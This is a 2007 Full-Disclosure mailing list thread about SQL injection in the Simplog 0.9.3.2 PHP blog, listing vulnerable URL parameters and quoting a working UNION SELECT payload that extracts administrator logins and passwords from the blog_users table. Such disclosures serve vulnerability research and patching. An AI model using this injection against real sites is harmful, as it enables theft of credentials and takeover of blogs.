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Re: [Full-disclosure] simplog 0.9.3.2 SQL injection
From: str0ke <str0ke () milw0rm com>
Date: Mon, 1 Jan 2007 21:06:05 -0600
Javor,
It seems rgod found this vulnerability back in April of 2006.
http://www.milw0rm.com/exploits/1663
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http://[target]/[path]/index.php?blogid=[sql]
http://[target]/[path]/archive.php?blogid=[sql]
http://[target]/[path]/archive.php?m=[sql]
http://[target]/[path]/archive.php?y=[sql]
/str0ke
On 1/1/07, Javor Ninov <drfrancky () securax org> wrote:
Afected Software:
simplog up to 0.9.3.2 (latest version - 12/05/2006 )
Site:
http://www.simplog.org
Simplog provides an easy way for users to add blogging capabilities to
their existing websites. Simplog is written in PHP and compatible with
multiple databases. Simplog also features an RSS/Atom aggregator/reader.
Powerful, yet simple
Vulnerability:
SQL Injection in archive.php
other files probably also affected
Example:
http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
Vendor status:
NOT NOTIFIED
Javor Ninov aka DrFrancky
drfrancky shift+2 securax.org
http://securitydot.net/
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